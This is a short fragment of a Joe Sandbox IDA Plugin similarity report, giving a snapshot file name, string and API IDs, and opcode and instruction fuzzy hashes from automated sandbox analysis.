              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: M_^9$M_^;$M_^=$M_^?
              • API String ID: 0-1741231188
              • Opcode ID: 4417cfde4658e00160b279777917866c78312d38f71b13784c2d48f4b49b07d2
              • Instruction ID: 9dfb259b5e120dc71a95e5ba13f7bbc320de19f8d9277ceafec9c652e8f95811
              • Opcode Fuzzy Hash: 4417cfde4658e00160b279777917866c78312d38f71b13784c2d48f4b49b07d2
              • Instruction Fuzzy Hash: 5290022170411346A30A3A7560598D463905F41214709C1B1D49E0D0C7491614C48645